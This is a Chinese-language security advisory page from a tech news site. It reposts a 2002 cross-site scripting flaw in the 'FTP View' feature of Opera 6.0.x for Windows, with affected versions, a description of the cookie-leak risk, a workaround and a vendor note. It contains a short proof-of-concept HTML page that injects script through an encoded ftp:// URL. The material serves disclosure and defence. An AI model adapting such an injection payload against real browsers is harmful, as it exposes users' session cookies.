您所在的位置: 首页 > 网络安全 > 漏洞补丁 > Windows >

Opera FTP View远程跨站脚本执行漏洞

http://netsecurity.51cto.com  2005-08-10 10:35    51CTO.COM  我要评论(0)
  • 摘要:异常处理错误##远程进入系统##及时修补
  • 标签:漏洞  IE  Opera


信息提供:

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

远程跨站脚本执行漏洞

攻击类型:

远程攻击

发布日期:

2002-08-06

更新日期:

2002-08-09

受影响系统:

Opera Software Opera Web Browser 6.0 win32
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 2000
Opera Software Opera Web Browser 6.0.1 win32
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 2000
Opera Software Opera Web Browser 6.0.2 win32
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 2000
Opera Software Opera Web Browser 6.0.3 win32
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 2000

安全系统:

漏洞报告人:

Eiji James Yoshida

漏洞描述:

BUGTRAQ  ID: 5401
Opera是一款流行的WEB浏览器。
Opera在使用'FTP view'功能时存在问题,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击。
Opera的'FTP View'功能在处理URL时对HTML字符缺少正确的检查,远程攻击者可以构建包含恶意脚本代码的FTP链接,当用户查看此链接时可导致恶意脚本代码在用户浏览器上执行,当FTP服务器和HTTP服务器地址相同时,由于COOKIE信息不会改变,就可以导致用户基于COOKIE认证的信息泄露。

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head>
<META http-equiv="Refresh" content="5 ; \
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.c \
om/"> </head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>

解决方法:

临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在浏览器中禁止使用Java脚本。
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com



Oracle 11g新特性与应用详解
深入Vista应用程序开发
华硕IDC绿色节能服务器推荐
深入SQL Server 2008
IT工程师该不该考CCIE?顶级认证的阵痛与希望
 
 验证码: (点击刷新验证码)   匿名发表
  • .NET程序员面试指南

  • 作者:朱毅
  • 本书着重针对.NET技术职位的应聘者,在.NET框架各个技术类别中,选取最常出现在.NET面试中的问题,进行分析和解答,同时解释和..
Copyright©2005-2008 51CTO.COM 版权所有